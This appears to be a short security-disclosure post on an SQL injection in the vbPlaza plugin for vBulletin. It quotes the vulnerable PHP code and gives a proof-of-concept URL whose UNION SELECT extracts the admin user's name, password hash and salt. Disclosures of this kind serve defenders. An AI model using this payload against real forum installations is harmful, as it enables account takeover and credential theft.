vBulletin vbBux and vbPlaza v4 Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=270271
Version: 4.0.3 (latest)

The vulnerability resides in the /vbplaza/tracklist.php file.
The vulnerable code:

// try to get the songs for this user
if (empty($_REQUEST['userid']))
	// set it to the currently logged in user
	$_REQUEST['userid'] = $vbulletin->userinfo['userid'];

// grab any user tracks from the database
$usertrack_cache = array();
if ($usertracks = $vbulletin->db->query_read("
	FROM " . TABLE_PREFIX . "vbplaza_track_user
	WHERE userid = " . $_REQUEST['userid'] . "
	ORDER BY displayorder, usertrackid

Nothing is sanitized and no validation. Very easy to exploit.

Proof of concept
http://example.com/vbplaza/tracklist.php?userid=userid UNION ALL SELECT null, null, null, null, null, null, concat(username, 0x3a, password, 0x3a, salt), null, null FROM user WHERE userid = 1

VBPlaza SQL Injection

Leave a Reply

Your email address will not be published / Required fields are marked *